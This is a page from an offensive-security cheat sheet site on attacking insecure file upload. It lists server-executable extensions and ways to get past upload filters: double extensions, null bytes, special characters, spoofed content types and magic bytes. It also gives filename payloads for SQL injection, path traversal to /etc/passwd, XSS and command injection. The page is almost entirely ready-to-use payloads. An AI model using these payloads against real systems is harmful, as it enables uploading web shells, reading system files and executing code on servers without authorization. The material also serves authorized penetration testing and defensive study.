pwny.cc
Search…
Home
WEB ATTACKS
Misc
OAuth
Open Redirect
Command Injection
Local File Inclusion (LFI)
Insecure File Upload
Insecure Direct Object Reference (IDOR)
SQL Injection (SQLi)
Cross-Site Scripting (XSS)
Server Side Request Forgery (SSRF)
Server Side Template Injection (SSTI)
XML External Entity (XXE)
SHELLS
Misc
Web Shells
Reverse Shells
Obfuscated Shells
SO
Linux
Windows
OTHER
Sandbox Escape
Cracking
Powered By
GitBook
Insecure File Upload
Defaults extensions
PHP
1
.php
2
.php2
3
.php3
4
.php4
5
.php5
6
.php7
7
.pht
8
.shtml
9
.phps
10
.phar
11
.phpt
12
.pgif
13
.phtml
14
.phtm
15
.inc
16
.htaccess
Copied!
ASP
1
.asp
2
.aspx
3
.cer
4
.asa
5
.ashx
6
.asmx
7
.axd
8
.cshtm
9
.cshtml
10
.rem
11
.soap
Copied!
JSP
1
.jsp
2
.jspx
3
.jsw
4
.jspf
5
.jsv
6
.wss
7
.do
8
.action
Copied!
Perl
1
.pl
2
.pm
3
.cgi
4
.lib
Copied!
Coldfusion
1
.cfm
2
.cfml
3
.cfc
4
.dbm
Copied!
Flash
1
.swf
Copied!
Erland Yaws Web Server
1
.yaws
Copied!
Bypasses
Double extensions
1
file.jpg.php
2
file.php.jpg
3
file.php.blah123jpg
4
file.png.php
5
file.png.Php5
6
file.php%00.png
7
file.php%0d%0a.png
8
file.php%0a.png
9
file.php
\
x00.png
Copied!
Null byte
1
file.php%00.gif
2
file.php\x00.gif
3
file.php%00.png
4
file.php\x00.png
5
file.php%00.jpg
6
file.php\x00.jpg
Copied!
Special characters
1
file.php
......
2
file.php%20
3
file.php%0a
4
file.php%00
5
file.php%0d%0a
6
file.php/
7
file.php.
\
8
file.
9
file.pHp5
....
10
file.%E2%80%AEphp.jpg
Copied!
Content-type Bypass
1
#Original name but different content-type
2
Content-Type: image/jpeg
3
Content-Type: image/gif
4
Content-Type: image/png
Copied!
Magic bytes
1
#Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application
2
PNG:
\
x89PNG
\
r
\
n
\
x1a
\
n
\
0
\
0
\
0
\
rIHDR
\
0
\
0
\
x03H
\
0
\
xs0
\
x03
[
3
JPG:
\
xff
\
xd8
\
xff
4
GIF: GIF87a
5
GIF: GIF8
Copied!
Triple equal
1
/?file=shell.php <-- Blocked
2
/?file===shell.php <-- Bypassed
Copied!
Filename Vulnerabilities:
1
#Time-Based SQLi Payloads
2
poc.js
'(select*from(select(sleep(20)))a)+'
.extension
3
4
#LFI Payloads
5
image.png
..
/
..
/
..
/
..
/
..
/
..
/
..
/etc/passwd
6
7
#XSS Payloads
8
'"
><
img
src
=
x
onerror
=
alert
(
document.domain
)
>
.extension
9
10
#File Traversal
11
..
/
..
/
..
/tmp/lol.png
12
13
#Command Injection
14
;
sleep
10
;
Copied!
Previous
LFI to RCE
Next - WEB ATTACKS
Insecure Direct Object Reference (IDOR)
Last modified
5mo ago
Copy link
Contents
Defaults extensions
Bypasses
Double extensions
Null byte
Special characters
Content-type Bypass
Magic bytes
Triple equal
Filename Vulnerabilities: